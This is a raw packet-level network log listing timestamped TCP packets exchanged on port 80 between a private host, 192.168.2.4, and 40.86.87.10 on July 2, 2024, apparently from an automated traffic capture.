Jul 2, 2024 07:31:13.153621912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153780937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153793097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153804064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153815031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153829098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153841972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153846979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153853893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153866053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153877020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153877974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153889894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153896093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153913975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153943062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154345036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154355049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154366016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154376030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154386044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154397964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154397964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154408932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154417992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154429913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154432058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154448032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154448032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154499054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154787064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154797077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154814959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154825926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154838085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154843092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154844046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154854059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154865026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154866934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154875994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154889107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154890060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154900074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.154927015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.154933929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155462980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155473948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155483961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155493975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155503988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155514002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155524969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155524969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155534983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155545950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155548096 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155556917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155567884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155571938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155582905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155595064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155599117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155601025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155611992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155613899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155625105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155631065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.155637026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155663967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.155682087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.156354904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156366110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156377077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156387091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156395912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156404972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156415939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156418085 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.156420946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156430960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156440973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.156444073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.156461954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.156497002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.157433033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157479048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157486916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.157490015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157541037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.157587051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157598019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157607079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157619953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157634020 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.157653093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.157679081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.157813072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157823086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157834053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157840967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.157879114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.157902956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.158243895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.158253908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.158263922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.158272982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.158282995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.158297062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.158328056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.188155890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188169956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188177109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188184023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188189030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188195944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188235044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188239098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188245058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.188328981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.188352108 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215188980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215207100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215213060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215260029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215271950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215274096 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215282917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215295076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215306044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215313911 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215339899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215399027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215410948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215445995 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215468884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215560913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215574980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215590954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215603113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215605021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215612888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215622902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215624094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215634108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215642929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215668917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215688944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215866089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215877056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215887070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215898037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215909004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.215914011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215935946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.215953112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.243822098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.243856907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.243899107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.243912935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.243987083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244040966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244043112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244075060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244091034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244122028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244188070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244220972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244242907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244265079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244272947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244293928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244317055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244334936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244353056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244396925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244496107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244508028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244518042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244528055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244539022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244549990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244549990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244560957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244585991 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244601011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244743109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244751930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244786024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244885921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244895935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244908094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244919062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244925022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244930029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244932890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244951010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.244970083 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.244998932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.272677898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.272733927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.272742033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.272787094 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.272934914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.272952080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.272967100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.272991896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273042917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273061991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273077011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273092031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273107052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273108006 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273123026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273142099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273397923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273410082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273422003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273427963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273437977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273463964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273479939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273488045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273494005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273524046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273539066 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273610115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273622036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273633003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273643970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273658991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273663044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273679972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273710012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273854971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273866892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273876905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273905039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273916960 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.273958921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273971081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273981094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.273992062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274000883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274003983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274017096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274024963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274027109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274039030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274054050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274068117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274097919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274605036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274615049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274626017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274636984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274651051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274652958 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274663925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274673939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274683952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274684906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274696112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274704933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274708033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274720907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274733067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274734020 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274739027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274740934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274749041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274760962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274770975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274775028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274784088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.274843931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.274859905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.275433064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275444984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275454998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275466919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275477886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275489092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275491953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.275501013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275511980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275521994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275532961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275538921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.275543928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.275563002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.275583982 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278595924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278661966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278676033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278707981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278729916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278750896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278758049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278810024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278810978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278868914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278868914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278902054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278920889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278934002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.278950930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.278990030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.305756092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.305850983 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.305964947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.305993080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306020021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306022882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306054115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306087971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306090117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306118965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306137085 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306148052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306169033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306178093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306194067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306209087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306230068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306238890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306257963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306262970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306279898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306294918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306302071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.306303024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.306320906 CEST	80	49730	40.86.87.10	192.168.2.4
